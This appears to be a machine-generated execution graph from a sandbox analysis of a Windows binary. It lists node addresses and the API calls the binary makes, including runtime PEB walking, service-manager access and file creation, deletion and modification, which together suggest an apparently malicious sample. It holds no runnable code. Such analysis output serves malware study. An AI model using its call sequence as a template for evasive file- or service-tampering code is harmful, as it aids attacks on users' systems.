                                                                                                                    execution_graph 5238 1c4c5d 5240 1c4d8d 5238->5240 5239 1c4dd2 5240->5239 5241 1d8606 2 API calls 5240->5241 5242 1c4da8 5241->5242 5246 1ccbdf 5242->5246 5245 1ca8b0 GetPEB 5245->5239 5247 1ccbfb 5246->5247 5249 1c4dbc 5247->5249 5250 1d4011 5247->5250 5249->5245 5251 1d4026 5250->5251 5252 1daa30 GetPEB 5251->5252 5253 1d4078 5252->5253 5253->5247 5254 1d0a96 5256 1d0aa6 5254->5256 5257 1d4087 GetPEB 5254->5257 5257->5256 5262 1c81b7 5273 1c8679 5262->5273 5263 1d8519 GetPEB 5263->5273 5265 1c8f65 2 API calls 5265->5273 5266 1dda22 GetPEB 5266->5273 5267 1c7ff2 2 API calls 5267->5273 5268 1cb6cf GetPEB 5268->5273 5269 1c86c6 5271 1d1e67 2 API calls 5269->5271 5274 1c86e2 5271->5274 5272 1cb23c 2 API calls 5272->5273 5273->5263 5273->5265 5273->5266 5273->5267 5273->5268 5273->5269 5273->5272 5273->5274 5275 1dc264 5273->5275 5279 1d458f 5273->5279 5276 1dc291 5275->5276 5277 1daa30 GetPEB 5276->5277 5278 1dc2dd 5277->5278 5278->5273 5280 1d45a2 5279->5280 5281 1daa30 GetPEB 5280->5281 5282 1d4619 5281->5282 5282->5273 3979 1c2950 3984 1d2550 3979->3984 3983 1c2a1a 3993 1d3775 3984->3993 3989 1de1d4 RtlAllocateHeap GetPEB 3989->3993 3990 1d3ff6 4243 1d7dd5 3990->4243 3991 1d3fe1 4236 1c91b0 3991->4236 3993->3989 3993->3990 3993->3991 3996 1d3fbb 3993->3996 3997 1c2a06 3993->3997 4007 1d8519 GetPEB 3993->4007 4017 1d7ba6 RtlAllocateHeap GetPEB 3993->4017 4022 1ca8b0 GetPEB 3993->4022 4026 1d20ba 3993->4026 4036 1d4116 3993->4036 4044 1d0326 3993->4044 4048 1c59f2 3993->4048 4058 1d95fa 3993->4058 4069 1d044f 3993->4069 4083 1d5cc4 3993->4083 4096 1d87d1 3993->4096 4101 1c64e2 3993->4101 4111 1d473c 3993->4111 4118 1c5361 3993->4118 4126 1d1ddd 3993->4126 4130 1e0056 3993->4130 4141 1d66ca 3993->4141 4151 1c2251 3993->4151 4158 1cb2c7 3993->4158 4170 1d1ee7 3993->4170 4173 1d9eec 3993->4173 4182 1c51bb 3993->4182 4187 1d8be3 3993->4187 4191 1cdff3 3993->4191 4198 1d7d48 3993->4198 4201 1dd2ce 3993->4201 4206 1c8dc4 3993->4206 4210 1c6d24 3993->4210 4219 1d9bcf 3993->4219 4225 1dcb5b 3996->4225 4023 1c93ed 3997->4023 4007->3993 4017->3993 4022->3993 4024 1daa30 GetPEB 4023->4024 4025 1c9456 ExitProcess 4024->4025 4025->3983 4029 1d23c3 4026->4029 4027 1d2503 4281 1dda22 4027->4281 4029->4027 4033 1d2501 4029->4033 4257 1d8f9e 4029->4257 4261 1d46bb 4029->4261 4265 1c912c 4029->4265 4269 1c7ff2 4029->4269 4274 1ca55f 4029->4274 4033->3993 4040 1d43df 4036->4040 4041 1dda22 GetPEB 4040->4041 4043 1d4508 4040->4043 4334 1c9350 4040->4334 4338 1d1e67 4040->4338 4342 1c8f65 4040->4342 4346 1dc1ec 4040->4346 4041->4040 4043->3993 4046 1d0340 4044->4046 4045 1c9011 RtlAllocateHeap GetPEB LoadLibraryW 4045->4046 4046->4045 4047 1d044a 4046->4047 4047->3993 4055 1c5caf 4048->4055 4049 1c5db3 4364 1c3c3c 4049->4364 4052 1c5db1 4052->3993 4053 1dda22 GetPEB 4053->4055 4055->4049 4055->4052 4055->4053 4350 1e13ad 4055->4350 4374 1ddcf7 4055->4374 4378 1c47ce 4055->4378 4382 1ca8b0 4055->4382 4066 1d99cc 4058->4066 4060 1ddcf7 2 API calls 4060->4066 4061 1d9ba9 4063 1d1e67 2 API calls 4061->4063 4062 1d9ba7 4062->3993 4063->4062 4064 1c8f65 2 API calls 4064->4066 4065 1c47ce GetPEB 4065->4066 4066->4060 4066->4061 4066->4062 4066->4064 4066->4065 4067 1dc1ec GetPEB 4066->4067 4068 1ca8b0 GetPEB 4066->4068 4423 1c5ddd 4066->4423 4067->4066 4068->4066 4082 1d0859 4069->4082 4071 1ddcf7 2 API calls 4071->4082 4072 1c7ff2 RtlAllocateHeap GetPEB 4072->4082 4073 1d09d9 4074 1d8519 GetPEB 4073->4074 4079 1d09ec 4074->4079 4076 1d0894 4435 1c957d 4076->4435 4078 1d08b3 4078->3993 4080 1d8519 GetPEB 4079->4080 4080->4078 4081 1ca8b0 GetPEB 4081->4082 4082->4071 4082->4072 4082->4073 4082->4076 4082->4078 4082->4081 4427 1c9462 4082->4427 4431 1d0dd6 4082->4431 4088 1d63a1 4083->4088 4084 1d8f9e 2 API calls 4084->4088 4086 1d6521 4089 1d8f9e 2 API calls 4086->4089 4087 1ddcf7 2 API calls 4087->4088 4088->4084 4088->4086 4088->4087 4091 1d46bb 2 API calls 4088->4091 4092 1d6543 4088->4092 4093 1c912c 2 API calls 4088->4093 4095 1ca8b0 GetPEB 4088->4095 4439 1cd6d8 4088->4439 4452 1c1cec 4088->4452 4456 1d1652 4088->4456 4089->4092 4091->4088 4092->3993 4093->4088 4095->4088 4097 1d888d 4096->4097 4100 1d8935 4097->4100 4479 1cee08 4097->4479 4483 1dab5e 4097->4483 4100->3993 4110 1c651f 4101->4110 4103 1d8519 GetPEB 4103->4110 4105 1c4b61 GetPEB 4105->4110 4107 1c6bd9 4107->3993 4110->4103 4110->4105 4110->4107 4487 1da666 4110->4487 4497 1df435 4110->4497 4515 1ccf47 4110->4515 4527 1c5548 4110->4527 4536 1de395 4110->4536 4113 1d4a28 4111->4113 4112 1d8f9e GetPEB CloseServiceHandle 4112->4113 4113->4112 4114 1c912c 2 API calls 4113->4114 4115 1d4b7d 4113->4115 4117 1c42c4 2 API calls 4113->4117 4701 1ce249 4113->4701 4114->4113 4115->3993 4117->4113 4123 1c537b 4118->4123 4119 1d8519 GetPEB 4119->4123 4120 1c7ff2 2 API calls 4120->4123 4123->4119 4123->4120 4124 1c553e 4123->4124 4705 1c960d 4123->4705 4709 1e0f33 4123->4709 4719 1c924b 4123->4719 4124->3993 4127 1d1df2 4126->4127 4128 1daa30 GetPEB 4127->4128 4129 1d1e5c 4128->4129 4129->3993 4138 1e0720 4130->4138 4132 1ddcf7 RtlAllocateHeap GetPEB 4132->4138 4133 1ccb52 GetPEB 4133->4138 4135 1d46bb 2 API calls 4135->4138 4136 1e09a3 4136->3993 4138->4132 4138->4133 4138->4135 4138->4136 4139 1d1652 GetPEB 4138->4139 4140 1ca8b0 GetPEB 4138->4140 4814 1cf002 4138->4814 4818 1caad6 4138->4818 4822 1c1fd1 4138->4822 4139->4138 4140->4138 4826 1d5c73 4141->4826 4143 1e13ad 2 API calls 4149 1d6a65 4143->4149 4144 1ddcf7 RtlAllocateHeap GetPEB 4144->4149 4145 1d6bbb 4145->3993 4146 1dd25e GetPEB 4146->4149 4147 1c47ce GetPEB 4147->4149 4149->4143 4149->4144 4149->4145 4149->4146 4149->4147 4150 1ca8b0 GetPEB 4149->4150 4829 1d453f 4149->4829 4150->4149 4157 1c227a 4151->4157 4152 1c2918 4153 1e0e3a GetPEB 4152->4153 4154 1c2916 4153->4154 4154->3993 4155 1e0e3a GetPEB 4155->4157 4156 1c7ff2 2 API calls 4156->4157 4157->4152 4157->4154 4157->4155 4157->4156 4165 1cb2df 4158->4165 4159 1c7ff2 2 API calls 4159->4165 4165->4159 4166 1cb6c2 4165->4166 4833 1d0b19 4165->4833 4840 1d0e53 4165->4840 4852 1d6df8 4165->4852 4873 1d4b87 4165->4873 4894 1cf09b 4165->4894 4906 1c9714 4165->4906 4914 1d1889 4165->4914 4925 1cb74d 4165->4925 4166->3993 4171 1c8dc4 GetPEB 4170->4171 4172 1d1f83 4171->4172 4172->3993 4177 1da152 4173->4177 4175 1d8519 GetPEB 4175->4177 4177->4175 4178 1da2de 4177->4178 5052 1cf899 4177->5052 5055 1ca9ce 4177->5055 5059 1c8ece 4177->5059 5063 1c4346 4177->5063 5070 1c4e7d 4177->5070 4178->3993 4183 1c5275 4182->4183 4185 1c7ff2 2 API calls 4183->4185 4186 1c52b8 4183->4186 5078 1d0001 4183->5078 4185->4183 4186->3993 4188 1d8e25 4187->4188 4189 1dd25e GetPEB 4188->4189 4190 1d8ef1 4188->4190 4189->4188 4190->3993 4192 1ce1a7 4191->4192 4193 1ce207 4192->4193 4194 1c7ff2 2 API calls 4192->4194 4196 1ce205 4192->4196 5107 1c7af6 4192->5107 4195 1c46be GetPEB 4193->4195 4194->4192 4195->4196 4196->3993 4199 1c7ff2 2 API calls 4198->4199 4200 1d7dc1 4199->4200 4200->3993 4202 1d5c73 GetPEB 4201->4202 4203 1dd370 4202->4203 5111 1d8b55 4203->5111 4207 1c8ddd 4206->4207 4208 1daa30 GetPEB 4207->4208 4209 1c8e3e 4208->4209 4209->3993 4214 1c6f44 4210->4214 4211 1c6ffc 5115 1c9dcf 4211->5115 4212 1cb6cf GetPEB 4212->4214 4214->4211 4214->4212 4215 1c6ffa 4214->4215 4216 1ddcf7 2 API calls 4214->4216 4217 1c47ce GetPEB 4214->4217 4218 1ca8b0 GetPEB 4214->4218 4215->3993 4216->4214 4217->4214 4218->4214 4222 1d9d3b 4219->4222 4220 1d9e49 4220->3993 4221 1cb6cf GetPEB 4221->4222 4222->4220 4222->4221 5138 1c52c2 4222->5138 5141 1c9b83 4222->5141 4233 1dcb83 4225->4233 4226 1ddcf7 RtlAllocateHeap GetPEB 4226->4233 4227 1dd0a6 4229 1cab87 3 API calls 4227->4229 4228 1d46bb 2 API calls 4228->4233 4231 1dd0d0 4229->4231 4230 1dd259 4230->4230 4231->3997 4232 1d1652 GetPEB 4232->4233 4233->4226 4233->4227 4233->4228 4233->4230 4233->4232 4235 1ca8b0 GetPEB 4233->4235 5179 1de32e 4233->5179 4235->4233 4237 1c91be 4236->4237 4238 1d0da3 4237->4238 4239 1d8519 GetPEB 4237->4239 4240 1c8dc4 GetPEB 4237->4240 4241 1d9e56 GetPEB 4237->4241 4242 1d1e67 2 API calls 4237->4242 4238->3997 4239->4237 4240->4237 4241->4237 4242->4237 4253 1d8118 4243->4253 4245 1d8245 4245->3997 4246 1ddcf7 2 API calls 4246->4253 4247 1d8247 4248 1cb6cf GetPEB 4247->4248 4252 1d825f 4248->4252 4249 1e13ad 2 API calls 4249->4253 4250 1d473c 4 API calls 4250->4253 4251 1c47ce GetPEB 4251->4253 5199 1cb1c6 4252->5199 4253->4245 4253->4246 4253->4247 4253->4249 4253->4250 4253->4251 4256 1ca8b0 GetPEB 4253->4256 5183 1c3e3f 4253->5183 5192 1d6c49 4253->5192 4256->4253 4258 1d8fb3 4257->4258 4285 1daa30 4258->4285 4262 1d46da 4261->4262 4263 1daa30 GetPEB 4262->4263 4264 1d4729 SHGetFolderPathW 4263->4264 4264->4029 4266 1c9149 4265->4266 4267 1daa30 GetPEB 4266->4267 4268 1c91a2 OpenSCManagerW 4267->4268 4268->4029 4315 1c1db9 4269->4315 4273 1c80db 4273->4029 4280 1ca73c 4274->4280 4276 1dda22 GetPEB 4276->4280 4277 1ca7f0 4326 1c3bc0 4277->4326 4279 1ca7ee 4279->4029 4280->4276 4280->4277 4280->4279 4322 1ccb52 4280->4322 4282 1dda3d 4281->4282 4330 1dadc9 4282->4330 4286 1dab1d 4285->4286 4287 1d8ffc CloseServiceHandle 4285->4287 4291 1d0a0e 4286->4291 4287->4029 4289 1dab33 4294 1ccdcd 4289->4294 4298 1d4087 GetPEB 4291->4298 4293 1d0aa6 4293->4289 4296 1ccdec 4294->4296 4295 1ccf0f 4295->4287 4296->4295 4299 1dbe27 4296->4299 4298->4293 4300 1dbfb1 4299->4300 4307 1cade6 4300->4307 4303 1dbff5 4305 1dc029 4303->4305 4306 1ccdcd GetPEB 4303->4306 4305->4295 4306->4305 4308 1cadfa 4307->4308 4309 1daa30 GetPEB 4308->4309 4310 1cae57 4309->4310 4310->4303 4311 1dcadf 4310->4311 4312 1dcaf5 4311->4312 4313 1daa30 GetPEB 4312->4313 4314 1dcb50 4313->4314 4314->4303 4316 1daa30 GetPEB 4315->4316 4317 1c1e19 4316->4317 4318 1c1e22 4317->4318 4319 1c1e3d 4318->4319 4320 1daa30 GetPEB 4319->4320 4321 1c1e96 RtlAllocateHeap 4320->4321 4321->4273 4323 1ccb6b 4322->4323 4324 1daa30 GetPEB 4323->4324 4325 1ccbd4 4324->4325 4325->4280 4327 1c3bd8 4326->4327 4328 1daa30 GetPEB 4327->4328 4329 1c3c2d 4328->4329 4329->4279 4331 1dadee 4330->4331 4332 1daa30 GetPEB 4331->4332 4333 1dae5d 4332->4333 4333->4033 4335 1c9371 4334->4335 4336 1daa30 GetPEB 4335->4336 4337 1c93db 4336->4337 4337->4040 4339 1d1e7d 4338->4339 4340 1daa30 GetPEB 4339->4340 4341 1d1edb CloseHandle 4340->4341 4341->4040 4343 1c8f90 4342->4343 4344 1daa30 GetPEB 4343->4344 4345 1c8ff5 CreateFileW 4344->4345 4345->4040 4347 1dc1fb 4346->4347 4348 1daa30 GetPEB 4347->4348 4349 1dc258 4348->4349 4349->4040 4351 1e13cb 4350->4351 4386 1c4b61 4351->4386 4354 1c4b61 GetPEB 4355 1e1637 4354->4355 4356 1c4b61 GetPEB 4355->4356 4357 1e164d 4356->4357 4358 1c3bc0 GetPEB 4357->4358 4359 1e1666 4358->4359 4360 1c3bc0 GetPEB 4359->4360 4361 1e1681 4360->4361 4390 1c4ddd 4361->4390 4363 1e16bf 4363->4055 4365 1c3c56 4364->4365 4366 1ddcf7 2 API calls 4365->4366 4367 1c3d7a 4366->4367 4402 1ca918 4367->4402 4370 1ca8b0 GetPEB 4371 1c3da2 4370->4371 4406 1d1f8a 4371->4406 4373 1c3db4 4373->4052 4375 1ddd0c 4374->4375 4376 1c7ff2 2 API calls 4375->4376 4377 1ddd93 4376->4377 4377->4055 4379 1c47f3 4378->4379 4380 1ca42d GetPEB 4379->4380 4381 1c480e 4380->4381 4381->4055 4383 1ca8c2 4382->4383 4413 1d8519 4383->4413 4387 1c4b74 4386->4387 4394 1c1ea7 4387->4394 4391 1c4df6 4390->4391 4392 1daa30 GetPEB 4391->4392 4393 1c4e69 SHFileOperationW 4392->4393 4393->4363 4395 1c1ebc 4394->4395 4398 1c702c 4395->4398 4399 1c7049 4398->4399 4400 1daa30 GetPEB 4399->4400 4401 1c1f4c 4400->4401 4401->4354 4403 1ca936 4402->4403 4410 1ca42d 4403->4410 4407 1d1f99 4406->4407 4408 1daa30 GetPEB 4407->4408 4409 1d1fef DeleteFileW 4408->4409 4409->4373 4411 1daa30 GetPEB 4410->4411 4412 1c3d95 4411->4412 4412->4370 4414 1d8529 4413->4414 4415 1c1db9 GetPEB 4414->4415 4416 1d85ed 4415->4416 4419 1ca30c 4416->4419 4420 1ca326 4419->4420 4421 1daa30 GetPEB 4420->4421 4422 1ca392 4421->4422 4422->4055 4424 1c5dff 4423->4424 4425 1daa30 GetPEB 4424->4425 4426 1c5e4f SetFileInformationByHandle 4425->4426 4426->4066 4428 1c9481 4427->4428 4429 1daa30 GetPEB 4428->4429 4430 1c94da 4429->4430 4430->4082 4432 1d0df7 4431->4432 4433 1daa30 GetPEB 4432->4433 4434 1d0e3f 4433->4434 4434->4082 4436 1c9595 4435->4436 4437 1daa30 GetPEB 4436->4437 4438 1c95ff 4437->4438 4438->4078 4448 1cd70e 4439->4448 4440 1cdf52 4443 1d8519 GetPEB 4440->4443 4441 1c7ff2 RtlAllocateHeap GetPEB 4441->4448 4442 1d8519 GetPEB 4442->4448 4445 1cdf63 4443->4445 4445->4088 4448->4440 4448->4441 4448->4442 4448->4445 4451 1d8f9e 2 API calls 4448->4451 4460 1c42c4 4448->4460 4464 1d2007 4448->4464 4468 1d16af 4448->4468 4472 1dd25e 4448->4472 4475 1cdf6f 4448->4475 4451->4448 4453 1c1d2d 4452->4453 4454 1daa30 GetPEB 4453->4454 4455 1c1d93 4454->4455 4455->4088 4457 1d1680 4456->4457 4458 1ca42d GetPEB 4457->4458 4459 1d16a7 4458->4459 4459->4088 4461 1c42e2 4460->4461 4462 1daa30 GetPEB 4461->4462 4463 1c4335 OpenServiceW 4462->4463 4463->4448 4465 1d2033 4464->4465 4466 1daa30 GetPEB 4465->4466 4467 1d209a 4466->4467 4467->4448 4469 1d16f3 4468->4469 4470 1daa30 GetPEB 4469->4470 4471 1d174d 4470->4471 4471->4448 4473 1daa30 GetPEB 4472->4473 4474 1dd2c5 4473->4474 4474->4448 4476 1cdf8a 4475->4476 4477 1daa30 GetPEB 4476->4477 4478 1cdfe1 4477->4478 4478->4448 4480 1cee1a 4479->4480 4481 1daa30 GetPEB 4480->4481 4482 1cee76 4481->4482 4482->4097 4484 1dab70 4483->4484 4485 1daa30 GetPEB 4484->4485 4486 1dabc6 4485->4486 4486->4097 4492 1da8cb 4487->4492 4489 1ddcf7 2 API calls 4489->4492 4490 1ca42d GetPEB 4490->4492 4491 1daa14 4493 1d8519 GetPEB 4491->4493 4492->4489 4492->4490 4492->4491 4494 1daa12 4492->4494 4495 1c7ff2 2 API calls 4492->4495 4496 1ca8b0 GetPEB 4492->4496 4553 1c4816 4492->4553 4493->4494 4494->4110 4495->4492 4496->4492 4511 1dfc7c 4497->4511 4498 1dffc3 4499 1d8606 2 API calls 4498->4499 4501 1dffe0 4499->4501 4500 1c7ff2 RtlAllocateHeap GetPEB 4500->4511 4576 1c7f1d 4501->4576 4502 1ddcf7 2 API calls 4502->4511 4504 1e003a 4507 1d8519 GetPEB 4504->4507 4512 1dffb1 4507->4512 4509 1ca8b0 GetPEB 4509->4512 4510 1ca42d GetPEB 4510->4511 4511->4498 4511->4500 4511->4502 4511->4504 4511->4510 4511->4512 4514 1ca8b0 GetPEB 4511->4514 4564 1d8606 4511->4564 4568 1dc0c1 4511->4568 4572 1ced7e 4511->4572 4512->4110 4514->4511 4526 1ccf7e 4515->4526 4517 1d8519 GetPEB 4517->4526 4520 1cd58f 4523 1d8519 GetPEB 4520->4523 4522 1c7ff2 2 API calls 4522->4526 4524 1cd5a6 4523->4524 4524->4110 4525 1ced7e GetPEB 4525->4526 4526->4517 4526->4520 4526->4522 4526->4524 4526->4525 4584 1c7735 4526->4584 4591 1c7e87 4526->4591 4595 1dae6d 4526->4595 4610 1c70b3 4526->4610 4529 1c5577 4527->4529 4530 1c5969 4529->4530 4531 1c5967 4529->4531 4534 1c7ff2 2 API calls 4529->4534 4535 1ced7e GetPEB 4529->4535 4641 1c5e60 4529->4641 4647 1caefb 4529->4647 4532 1d8519 GetPEB 4530->4532 4531->4110 4532->4531 4534->4529 4535->4529 4551 1de406 4536->4551 4537 1df410 4689 1c2b62 4537->4689 4538 1ddcf7 2 API calls 4538->4551 4542 1df426 4542->4110 4546 1ca8b0 GetPEB 4546->4551 4547 1c2b62 GetPEB 4547->4551 4548 1d8519 GetPEB 4548->4551 4551->4537 4551->4538 4551->4542 4551->4546 4551->4547 4551->4548 4552 1c9670 GetPEB 4551->4552 4657 1ddac6 4551->4657 4661 1c88c3 4551->4661 4665 1c75fa 4551->4665 4669 1d408e 4551->4669 4673 1c2ae4 4551->4673 4677 1e09b5 4551->4677 4680 1da2e8 4551->4680 4552->4551 4555 1c4836 4553->4555 4556 1c4b23 4555->4556 4558 1c4b21 4555->4558 4559 1c7ff2 2 API calls 4555->4559 4560 1d847f 4555->4560 4557 1d847f GetPEB 4556->4557 4557->4558 4558->4492 4559->4555 4561 1d84a6 4560->4561 4562 1daa30 GetPEB 4561->4562 4563 1d8502 4562->4563 4563->4555 4565 1d861f 4564->4565 4566 1c7ff2 2 API calls 4565->4566 4567 1d86bc 4566->4567 4567->4511 4569 1dc0e6 4568->4569 4570 1ca42d GetPEB 4569->4570 4571 1dc108 4570->4571 4571->4511 4573 1ced97 4572->4573 4580 1d7a71 4573->4580 4577 1c7f39 4576->4577 4578 1ca42d GetPEB 4577->4578 4579 1c7f55 4578->4579 4579->4509 4581 1d7a8a 4580->4581 4582 1daa30 GetPEB 4581->4582 4583 1cee00 4582->4583 4583->4511 4587 1c7764 4584->4587 4585 1c7ff2 2 API calls 4585->4587 4586 1c7a10 4586->4526 4587->4585 4587->4586 4588 1e0e3a GetPEB 4587->4588 4589 1c79f3 4587->4589 4588->4587 4617 1e0e3a 4589->4617 4592 1c7e9a 4591->4592 4593 1ced7e GetPEB 4592->4593 4594 1c7f16 4593->4594 4594->4526 4596 1daea5 4595->4596 4599 1dbaf7 4596->4599 4600 1ddcf7 RtlAllocateHeap GetPEB 4596->4600 4601 1c7ff2 2 API calls 4596->4601 4603 1dbaf5 4596->4603 4606 1c9462 GetPEB 4596->4606 4607 1d8519 GetPEB 4596->4607 4609 1ca8b0 GetPEB 4596->4609 4621 1e0b68 4596->4621 4625 1d7b05 4596->4625 4629 1d6bc6 4596->4629 4633 1ca81d 4596->4633 4637 1d828a 4596->4637 4602 1c957d GetPEB 4599->4602 4600->4596 4601->4596 4602->4603 4603->4526 4606->4596 4607->4596 4609->4596 4612 1c70dc 4610->4612 4611 1d5b3b GetPEB 4611->4612 4612->4611 4613 1c74a7 4612->4613 4614 1c7ff2 2 API calls 4612->4614 4615 1c74bb 4612->4615 4616 1d8519 GetPEB 4613->4616 4614->4612 4615->4526 4616->4615 4618 1e0e58 4617->4618 4619 1ced7e GetPEB 4618->4619 4620 1e0f24 4619->4620 4620->4586 4622 1e0b97 4621->4622 4623 1daa30 GetPEB 4622->4623 4624 1e0bfc 4623->4624 4624->4596 4626 1d7b37 4625->4626 4627 1daa30 GetPEB 4626->4627 4628 1d7b8a 4627->4628 4628->4596 4630 1d6bda 4629->4630 4631 1daa30 GetPEB 4630->4631 4632 1d6c3d 4631->4632 4632->4596 4634 1ca83f 4633->4634 4635 1daa30 GetPEB 4634->4635 4636 1ca89d 4635->4636 4636->4596 4638 1d82a9 4637->4638 4639 1daa30 GetPEB 4638->4639 4640 1d8300 4639->4640 4640->4596 4645 1c5e82 4641->4645 4642 1d8519 GetPEB 4642->4645 4643 1c7ff2 2 API calls 4643->4645 4644 1c64bd 4644->4529 4645->4642 4645->4643 4645->4644 4646 1cca90 GetPEB 4645->4646 4646->4645 4649 1caf1c 4647->4649 4648 1dae6d 2 API calls 4648->4649 4649->4648 4650 1cb0b3 4649->4650 4651 1cb0e8 4649->4651 4653 1de274 4650->4653 4651->4529 4654 1de2a0 4653->4654 4655 1daa30 GetPEB 4654->4655 4656 1de312 4655->4656 4656->4651 4658 1ddae5 4657->4658 4659 1daa30 GetPEB 4658->4659 4660 1ddb32 4659->4660 4660->4551 4662 1c88f5 4661->4662 4663 1daa30 GetPEB 4662->4663 4664 1c8950 4663->4664 4664->4551 4666 1c762c 4665->4666 4667 1daa30 GetPEB 4666->4667 4668 1c7690 4667->4668 4668->4551 4670 1d40b3 4669->4670 4671 1daa30 GetPEB 4670->4671 4672 1d4103 4671->4672 4672->4551 4674 1c2b04 4673->4674 4675 1daa30 GetPEB 4674->4675 4676 1c2b4b 4675->4676 4676->4551 4693 1c94ee 4677->4693 4686 1da519 4680->4686 4681 1c7ff2 RtlAllocateHeap GetPEB 4681->4686 4683 1da634 4684 1da64a 4683->4684 4685 1d8519 GetPEB 4683->4685 4684->4551 4685->4684 4686->4681 4686->4683 4687 1ced7e GetPEB 4686->4687 4688 1d8519 GetPEB 4686->4688 4697 1dc032 4686->4697 4687->4686 4688->4686 4690 1c2b77 4689->4690 4691 1daa30 GetPEB 4690->4691 4692 1c2bce 4691->4692 4692->4542 4694 1c9511 4693->4694 4695 1daa30 GetPEB 4694->4695 4696 1c9566 4695->4696 4696->4551 4698 1dc054 4697->4698 4699 1daa30 GetPEB 4698->4699 4700 1dc0ae 4699->4700 4700->4686 4702 1ce262 4701->4702 4703 1daa30 GetPEB 4702->4703 4704 1ce2c1 4703->4704 4704->4113 4706 1c9623 4705->4706 4723 1d8315 4706->4723 4713 1e11d1 4709->4713 4710 1ddcf7 2 API calls 4710->4713 4711 1d1652 GetPEB 4711->4713 4712 1c7ff2 2 API calls 4712->4713 4713->4710 4713->4711 4713->4712 4714 1ca8b0 GetPEB 4713->4714 4715 1e1380 4713->4715 4718 1e1391 4713->4718 4810 1d7ba6 4713->4810 4714->4713 4717 1d8519 GetPEB 4715->4717 4717->4718 4718->4123 4720 1c92ac 4719->4720 4721 1c92c1 4719->4721 4720->4721 4722 1d8519 GetPEB 4720->4722 4721->4123 4722->4720 4729 1d832d 4723->4729 4725 1d845c 4728 1d8519 GetPEB 4725->4728 4727 1c966a 4727->4123 4728->4727 4729->4725 4729->4727 4730 1c7ff2 2 API calls 4729->4730 4732 1cbb7e 4729->4732 4749 1c4bc7 4729->4749 4754 1d907f 4729->4754 4730->4729 4747 1cc63d 4732->4747 4735 1cca5b 4737 1c957d GetPEB 4735->4737 4739 1cca59 4737->4739 4738 1ca958 GetPEB 4738->4747 4739->4729 4741 1c9462 GetPEB 4741->4747 4744 1ddcf7 RtlAllocateHeap GetPEB 4744->4747 4745 1ced7e GetPEB 4745->4747 4747->4735 4747->4738 4747->4739 4747->4741 4747->4744 4747->4745 4748 1ca8b0 GetPEB 4747->4748 4763 1caa4d 4747->4763 4767 1cb144 4747->4767 4771 1c1c45 4747->4771 4775 1d4624 4747->4775 4779 1c92c7 4747->4779 4783 1dca69 4747->4783 4787 1c2bd9 4747->4787 4748->4747 4750 1dca69 GetPEB 4749->4750 4751 1c4c44 4750->4751 4752 1d8519 GetPEB 4751->4752 4753 1c4c57 4752->4753 4753->4729 4756 1d947b 4754->4756 4755 1d95cb 4757 1c957d GetPEB 4755->4757 4756->4755 4758 1caa4d GetPEB 4756->4758 4759 1d95c9 4756->4759 4760 1ddcf7 RtlAllocateHeap GetPEB 4756->4760 4761 1c9462 GetPEB 4756->4761 4762 1ca8b0 GetPEB 4756->4762 4757->4759 4758->4756 4759->4729 4760->4756 4761->4756 4762->4756 4764 1caa76 4763->4764 4765 1daa30 GetPEB 4764->4765 4766 1caab9 4765->4766 4766->4747 4768 1cb15f 4767->4768 4769 1daa30 GetPEB 4768->4769 4770 1cb1b8 4769->4770 4770->4747 4772 1c1c76 4771->4772 4773 1daa30 GetPEB 4772->4773 4774 1c1cd0 4773->4774 4774->4747 4776 1d4646 4775->4776 4777 1daa30 GetPEB 4776->4777 4778 1d46a8 4777->4778 4778->4747 4780 1c92e5 4779->4780 4781 1daa30 GetPEB 4780->4781 4782 1c933c 4781->4782 4782->4747 4784 1dca7b 4783->4784 4785 1daa30 GetPEB 4784->4785 4786 1dcad4 4785->4786 4786->4747 4801 1c3757 4787->4801 4788 1c3a7d 4791 1c957d GetPEB 4788->4791 4789 1c7ff2 2 API calls 4789->4801 4790 1d8519 GetPEB 4790->4801 4793 1c3aa2 4791->4793 4792 1c3bbb 4792->4792 4793->4747 4794 1ddcf7 RtlAllocateHeap GetPEB 4794->4801 4795 1ccb52 GetPEB 4795->4801 4796 1c9462 GetPEB 4796->4801 4799 1ca8b0 GetPEB 4799->4801 4800 1e0b68 GetPEB 4800->4801 4801->4788 4801->4789 4801->4790 4801->4792 4801->4794 4801->4795 4801->4796 4801->4799 4801->4800 4802 1dd84c 4801->4802 4806 1c8d13 4801->4806 4803 1dd87f 4802->4803 4804 1daa30 GetPEB 4803->4804 4805 1dd8ca 4804->4805 4805->4801 4807 1c8d41 4806->4807 4808 1daa30 GetPEB 4807->4808 4809 1c8da7 4808->4809 4809->4801 4811 1d7bbf 4810->4811 4812 1c7ff2 2 API calls 4811->4812 4813 1d7c88 4812->4813 4813->4713 4813->4813 4815 1cf02e 4814->4815 4816 1daa30 GetPEB 4815->4816 4817 1cf082 4816->4817 4817->4138 4819 1cab09 4818->4819 4820 1daa30 GetPEB 4819->4820 4821 1cab6d 4820->4821 4821->4138 4823 1c1fe3 4822->4823 4824 1daa30 GetPEB 4823->4824 4825 1c2045 4824->4825 4825->4138 4827 1daa30 GetPEB 4826->4827 4828 1d5cbb 4827->4828 4828->4149 4830 1d4567 4829->4830 4831 1ca42d GetPEB 4830->4831 4832 1d4587 4831->4832 4832->4149 4837 1d0d2c 4833->4837 4834 1d0da3 4834->4165 4835 1d8519 GetPEB 4835->4837 4836 1c8dc4 GetPEB 4836->4837 4837->4834 4837->4835 4837->4836 4839 1d1e67 2 API calls 4837->4839 4933 1d9e56 4837->4933 4839->4837 4850 1d144a 4840->4850 4841 1d46bb 2 API calls 4841->4850 4842 1d1647 4842->4165 4843 1dda22 GetPEB 4843->4850 4846 1ddcf7 RtlAllocateHeap GetPEB 4846->4850 4848 1c47ce GetPEB 4848->4850 4849 1ca8b0 GetPEB 4849->4850 4850->4841 4850->4842 4850->4843 4850->4846 4850->4848 4850->4849 4941 1cb6cf 4850->4941 4945 1c8969 4850->4945 4949 1cea99 4850->4949 4956 1cab87 4850->4956 4872 1d7703 4852->4872 4854 1dd2ce GetPEB 4854->4872 4856 1d1e67 CloseHandle GetPEB 4856->4872 4858 1dda22 GetPEB 4858->4872 4859 1d7759 4861 1cab87 3 API calls 4859->4861 4860 1d77d7 4860->4165 4863 1d7789 4861->4863 4862 1cb6cf GetPEB 4862->4872 4863->4860 4864 1d1e67 2 API calls 4863->4864 4866 1d77b2 4864->4866 4865 1c8969 GetPEB 4865->4872 4867 1d1e67 2 API calls 4866->4867 4867->4860 4868 1ddcf7 2 API calls 4868->4872 4869 1c47ce GetPEB 4869->4872 4870 1ca8b0 GetPEB 4870->4872 4871 1cea99 3 API calls 4871->4872 4872->4854 4872->4856 4872->4858 4872->4859 4872->4860 4872->4862 4872->4865 4872->4868 4872->4869 4872->4870 4872->4871 4974 1dbb23 